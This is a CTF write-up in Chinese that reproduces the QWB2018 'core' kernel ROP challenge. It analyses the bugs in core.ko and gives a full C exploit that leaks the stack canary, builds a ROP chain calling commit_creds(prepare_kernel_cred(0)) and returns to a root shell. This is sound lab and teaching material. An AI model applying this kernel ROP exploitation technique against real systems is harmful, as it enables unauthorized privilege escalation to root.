前面做了一道kernel-uaf的题,接着复现一下kernel-rop的题目
环境分析
- 首先按照kernel pwn的套路,先解压core.cpio文件,查看init文件
#!/bin/sh
# init from core.cpio (the challenge rootfs): mount the pseudo filesystems,
# load the vulnerable module and drop into an unprivileged shell.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# The kallsyms snapshot is taken BEFORE kptr_restrict is raised, so the copy
# in /tmp holds real kernel addresses; the exploit below reads it as uid 1000
# to get the kernel base (startup_64) and the cred helper addresses.
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
# The target module (presumably the one backing /proc/core used by the exploit).
insmod /core.ko
# Forced poweroff after 120 s -- remove this line before repacking for debugging.
poweroff -d 120 -f &
# Unprivileged shell; privilege escalation has to happen from here.
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys
poweroff -d 0 -f
- 从脚本中可以看到需要分析的模块是 core.ko。脚本里还有一条定时关机命令(`poweroff -d 120 -f &`),为了不影响调试,把这一行删掉后再重新打包。另外注意 init 是在把 kptr_restrict 置 1 **之前**先把 /proc/kallsyms 复制到了 /tmp/kallsyms,所以这个文件里保存的是真实的内核地址,而且普通用户(uid 1000)也能读,可以用它 leak 出内核基址以及 commit_creds、prepare_kernel_cred 的地址
./gen_cpio.sh core.cpio
- 启动时候发现有报错,是因为分配的内存过小,将start.sh 中-m分配的64M修改为128M即可
Kernel panic - not syncing: Out of memory and no killable processes...
模块分析
- 首先看开了什么保护
☁ give_to_player checksec core.ko
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/core.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)
- 然后用 IDA 分析。core_copy_func 的参数 a1 是 signed __int64,长度检查 `a1 > 63` 是带符号比较,但真正传给 qmemcpy 的长度是 `(unsigned __int16)a1`。因此传入一个负数(例如 0xffffffffffff0100)可以通过检查,而实际拷贝长度是它的低 16 位(0x100),这样就能把 name 里的 rop 链溢出拷贝到栈上,覆盖 canary 和返回地址
/*
 * IDA pseudo-code of core_copy_func (core.ko): copies from the module
 * global `name` into the 0x40-byte stack buffer v2.
 *
 * Bug: the bound is checked on the signed 64-bit a1 (only a1 > 63 is
 * rejected) but the length handed to qmemcpy is the low 16 bits of a1.
 * A negative a1 such as 0xffffffffffff0100 passes the check and copies
 * 0x100 bytes, overrunning v2 (rbp-0x50) across the canary v3 (rbp-0x10,
 * i.e. +0x40 from v2), the saved rbp (+0x48) and the return address (+0x50).
 */
signed __int64 __fastcall core_copy_func(signed __int64 a1)
{
signed __int64 result; // rax
__int64 v2; // [rsp+0h] [rbp-50h]   destination buffer that gets overflowed
unsigned __int64 v3; // [rsp+40h] [rbp-10h]   stack canary (gs:0x28)
v3 = __readgsqword(0x28u);
printk(&unk_215);
if ( a1 > 63 ) // signed compare: any negative a1 falls through to the copy
{
printk(&unk_2A1);
result = 0xFFFFFFFFLL; // -1 as a 32-bit value
}
else
{
result = 0LL;
qmemcpy(&v2, &name, (unsigned __int16)a1); // length = a1 & 0xffff, unchecked against sizeof v2
}
return result;
}
- core_ioctl 可以把全局变量 off 设为任意值(没有任何范围检查),而 core_read 会从栈上局部变量 v5 加上 off 的位置拷贝 64 字节到用户空间,所以控制 off 就能 leak 出 canary 以及栈上的返回地址等内核地址
/*
 * IDA pseudo-code of the module's ioctl handler.  The request numbers are
 * 0x6677889B (read), 0x6677889C (set off) and 0x6677889A (copy); a3 is the
 * user-supplied argument and is passed on without any validation.
 */
__int64 __fastcall core_ioctl(__int64 a1, int a2, __int64 a3)
{
signed __int64 v3; // rbx
v3 = a3;
switch ( a2 )
{
case 1719109787: // 0x6677889B: core_read(user_ptr) -- leak 64 bytes from the stack
core_read(a3);
break;
case 1719109788: // 0x6677889C: off = a3 -- arbitrary, unchecked stack offset for core_read
printk(&unk_2CD);
off = v3;
break;
case 1719109786: // 0x6677889A: core_copy_func(len) -- the overflow primitive
printk(&unk_2B3);
core_copy_func(v3);
break;
}
return 0LL; // always "success", even for unknown requests
}
/*
 * IDA pseudo-code of core_read: zeroes a 64-byte stack buffer v5, writes a
 * banner into it, then copies 64 bytes starting at &v5 + off to user space.
 *
 * Leak: `off` is the attacker-controlled global set via ioctl and is never
 * bounds-checked, so the read can start anywhere relative to v5.  With
 * off = 0x40 the copied bytes are the canary v6 (rbp-0x10), the saved rbp
 * and this function's return address inside core.ko.
 */
unsigned __int64 __fastcall core_read(__int64 a1)
{
__int64 v1; // rbx
__int64 *v2; // rdi
signed __int64 i; // rcx
unsigned __int64 result; // rax
__int64 v5; // [rsp+0h] [rbp-50h]   64-byte buffer (same layout as core_copy_func's v2)
unsigned __int64 v6; // [rsp+40h] [rbp-10h]   stack canary
v1 = a1; // user destination pointer
v6 = __readgsqword(0x28u);
printk(&unk_25B);
printk(&unk_275);
v2 = &v5;
for ( i = 16LL; i; --i ) // 16 dwords = 64 bytes zeroed
{
*(_DWORD *)v2 = 0;
v2 = (__int64 *)((char *)v2 + 4);
}
strcpy((char *)&v5, "Welcome to the QWB CTF challenge.\n");
result = copy_to_user(v1, (char *)&v5 + off, 64LL); // off unchecked: out-of-bounds stack read
if ( !result )
return __readgsqword(0x28u) ^ v6; // stack-protector check (decompiler rendering)
__asm { swapgs } // failure path; likely decompiler noise from the stack-check handler
return result;
}
- core_write 让我们向模块的全局缓冲区 name 写入最多 0x800 字节。先用 core_write 把 rop 链写进 name,再用 core_copy_func 把它拷到栈上,就实现了写入 rop_chain
/*
 * IDA pseudo-code of core_write: copies up to 0x800 bytes from the user
 * buffer a2 into the module global `name`.  This is how the ROP chain is
 * staged before core_copy_func moves it onto the stack.  The size of
 * `name` itself is not visible here.
 */
signed __int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
unsigned __int64 v3; // rbx
v3 = a3; // requested length
printk(&unk_215);
if ( v3 <= 0x800 && !copy_from_user(&name, a2, v3) )
return (unsigned int)v3; // bytes written
printk(&unk_230);
return 4294967282LL; // 0xFFFFFFF2 == -14 as a 32-bit value (-EFAULT)
}
利用思路
- 通过 ioctl 设置 off,然后通过 core_read() leak 出 canary
- 通过 core_write() 向 name 写,构造 ropchain
- 通过 core_copy_func() 从 name 向局部变量上写,通过设置合理的长度和 canary 进行 rop
- 通过 rop 执行 commit_creds(prepare_kernel_cred(0))
- 返回用户态,通过 system("/bin/sh") 等起 shell
编写exp
- 编写 exp 的时候需要边写边调试。下图是调试寻找泄漏 canary 的偏移:由图可知 canary 距离 rsp 的偏移是 0x40(对应 core_read 中 v5 在 [rbp-50h]、canary v6 在 [rbp-10h]),返回地址的偏移是 0x50
- 接下来是找覆盖返回地址的偏移。core_copy_func 的栈布局和 core_read 相同(缓冲区 v2 在 [rbp-50h],canary v3 在 [rbp-10h]),由图可知返回地址的偏移同样是 0x50
- 找 gadget 的偏移:不能从带符号的 vmlinux 里面找 gadget,要从实际运行的 bzImage 里提取出来之后再找。先用 extract-vmlinux 提取出文件,再用 ropper 找 gadget
☁ give_to_player ./extract-vmlinux ./bzImage > rop_gadget
☁ give_to_player ropper --file './rop_gadget' --search "pop rdx; ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx; ret
[INFO] File: ./rop_gadget
0xffffffff81f1023d: pop rdx; ret 0x6fff;
0xffffffff817f8da2: pop rdx; ret 0xa0;
0xffffffff817023a4: pop rdx; ret 0xebff;
0xffffffff810a0f49: pop rdx; ret;
☁ give_to_player bpython
bpython version 0.17.1 on top of Python 2.7.12 /usr/bin/python
>>> from pwn import *
>>> vmlinux = ELF("./rop_gadget")
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/rop_ga
dget'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0xffffffff81000000)
RWX: Has RWX segments
>>> pop_rdx_ret_offset = hex(0xffffffff810a0f49 - 0xffffffff81000000)
>>> pop_rdx_ret_offset
'0xa0f49'
- 写exp,这里直接套用charlie师傅的exp
//gcc exp.c -o exp -static -masm=intel
/* The page's HTML stripped the <...> header names from these includes; they
 * are reconstructed from the calls the exploit makes (puts/printf/popen/
 * fscanf, system/exit, open, ioctl, write). */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>
/* User-mode cs, ss, rflags and rsp captured by save_status(); they form the
 * iretq frame at the end of the ROP chain. */
size_t user_cs, user_ss, user_rflags, user_sp;
/*
 * Snapshot the user-mode cs, ss, rsp and rflags into the globals above.
 * They are placed in the iretq frame at the end of the ROP chain so the
 * kernel returns to ring 3 with a sane segment/flag state.  Intel syntax
 * (compiled with -masm=intel); operands are the file-scope globals.
 */
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;" // rsp inside this frame; only reused as the post-iretq stack
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
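/*
 * Landing point of the iretq frame: runs in ring 3 with the root creds
 * installed by commit_creds().  exit() afterwards instead of returning:
 * the stack we arrive on is the rsp captured inside save_status(), which
 * holds no return address meant for this function, so a plain `ret` after
 * the shell exits would jump to whatever happens to be there.
 */
void binsh()
{
    system("/bin/sh");
    exit(0);
}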
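/* Request numbers of core_ioctl's switch (1719109786/87/88 in decimal). */
enum {
    CORE_COPY   = 0x6677889A, /* core_copy_func(arg): name -> stack, len = (u16)arg */
    CORE_READ   = 0x6677889B, /* core_read(arg): 64 bytes from stack + off -> user */
    CORE_SETOFF = 0x6677889C  /* off = arg, unchecked */
};

/* Kernel-text offsets of the cred helpers for this challenge's image; used
 * only if the symbol cannot be read from /tmp/kallsyms. */
enum {
    OFF_COMMIT_CREDS        = 0x9c8e0,
    OFF_PREPARE_KERNEL_CRED = 0x9cce0
};

/*
 * Resolve one symbol from the kallsyms copy that init leaves in /tmp
 * (taken before kptr_restrict is raised, so the addresses are real).
 * The name is matched exactly, not as a substring, so "startup_64" cannot
 * pick up e.g. secondary_startup_64.  Returns 0 on any failure.
 */
static unsigned long kallsyms_lookup(const char *sym)
{
    char cmd[256];
    void *addr = NULL;

    snprintf(cmd, sizeof cmd,
             "awk '$3 == \"%s\" { print $1; exit }' /tmp/kallsyms", sym);
    FILE *p = popen(cmd, "r");
    if (!p)
        return 0;
    if (fscanf(p, "%p", &addr) != 1)
        addr = NULL;
    pclose(p); /* popen() streams are closed with pclose(), not fclose() */
    return (unsigned long)addr;
}

/*
 * Exploit driver: leak the canary through core_read, stage a ROP chain in
 * `name` through core_write, then trigger the core_copy_func overflow.
 * Returns non-zero only if a setup step fails; on success the iretq at the
 * end of the chain lands in binsh() and this function never returns.
 */
int main()
{
    save_status();

    unsigned long kbase = kallsyms_lookup("startup_64");
    if (!kbase) {
        fputs("[-] cannot read startup_64 from /tmp/kallsyms\n", stderr);
        return EXIT_FAILURE;
    }
    unsigned long commit_creds = kallsyms_lookup("commit_creds");
    if (!commit_creds)
        commit_creds = kbase + OFF_COMMIT_CREDS;
    unsigned long prepare_kernel_cred = kallsyms_lookup("prepare_kernel_cred");
    if (!prepare_kernel_cred)
        prepare_kernel_cred = kbase + OFF_PREPARE_KERNEL_CRED;
    printf("commit_creds is %p \nbase is %p \nprepare is %p\n",
           (void *)commit_creds, (void *)kbase, (void *)prepare_kernel_cred);

    int fd = open("/proc/core", O_WRONLY);
    if (fd < 0) {
        perror("open /proc/core");
        return EXIT_FAILURE;
    }

    /* Leak: core_read copies 64 bytes from &v5 + off; v5 is at rbp-0x50 and
     * the canary v6 at rbp-0x10, so off = 0x40 yields [0] canary,
     * [1] saved rbp, [2] core_read's return address inside core.ko. */
    unsigned long leak[0x10] = {0};
    if (ioctl(fd, CORE_SETOFF, 0x40) < 0 || ioctl(fd, CORE_READ, leak) < 0) {
        perror("ioctl leak");
        return EXIT_FAILURE;
    }
    printf("canary is %lx\nret addr is %lx\n", leak[0], leak[2]);

    /* Gadgets as offsets from the kernel base (from the ropper session on
     * the extracted bzImage; valid for this image only). */
    unsigned long pop_rdi             = kbase + 0xb2f;
    unsigned long pop_rdx             = kbase + 0xa0f49;
    unsigned long mov_rdi_rax_jmp_rdx = kbase + 0x6a6d2;
    unsigned long swapgs_popfq        = kbase + 0xa012da;
    unsigned long iretq               = kbase + 0x50ac2;

    /* core_copy_func's buffer v2 is at rbp-0x50 and its canary at rbp-0x10:
     * index 8 must carry the leaked canary, index 9 the saved rbp, and the
     * chain starts at index 10 (the return-address slot). */
    unsigned long payload[0x40] = {0};
    int i = 8;
    payload[i++] = leak[0];              /* canary */
    payload[i++] = leak[1];              /* saved rbp */
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;  /* rax = prepare_kernel_cred(0) */
    payload[i++] = pop_rdx;
    payload[i++] = commit_creds;
    payload[i++] = mov_rdi_rax_jmp_rdx;  /* commit_creds(rax); relies on a jmp --
                                            a call would push a return address
                                            and derail the chain */
    payload[i++] = swapgs_popfq;         /* swapgs; popfq; ret */
    payload[i++] = 0;                    /* value popped into rflags */
    payload[i++] = iretq;                /* iretq; ret -- frame follows */
    payload[i++] = (unsigned long)binsh; /* rip */
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_sp;
    payload[i++] = user_ss;

    /* Stage the chain in the module global `name` (core_write caps at 0x800). */
    if (write(fd, payload, sizeof payload) != (ssize_t)sizeof payload) {
        perror("write");
        return EXIT_FAILURE;
    }

    /* Trigger: negative so `a1 > 63` is false; low 16 bits 0x100 so qmemcpy
     * copies 0x100 bytes (32 qwords), enough to cover the whole chain. */
    unsigned long len = 0xffffffffffff0000UL | 0x100;
    ioctl(fd, CORE_COPY, len);
    /* Not reached if the chain ran: iretq lands in binsh(). */
    return 0;
}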
- 编译exp,然后重打包fs,启动系统,运行exp
☁ give_to_player gcc exp.c -o exp -static -masm=intel
☁ give_to_player cd core
☁ core ./gen_cpio.sh core.cpio
☁ core cp ./core.cpio ../
☁ core cd ..
☁ give_to_player ./start.sh
/ $ ./exp
[*]status has been saved.
commit_creds is 0xffffffffbd29c8e0
base is 0xffffffffbd200000
prepare is 0xffffffffbd29cce0
ret addr is ffffffffc039119b
/ # id
uid=0(root) gid=0(root)
/ #
参考文章:
- https://ch4r1l3.github.io/2018/10/09/linux-kernel-pwn-%E5%88%9D%E6%8E%A2-3/
- http://m4x.fun/post/linux-kernel-pwn-abc-1/#kernel-rop-2018%E5%BC%BA%E7%BD%91%E6%9D%AF-core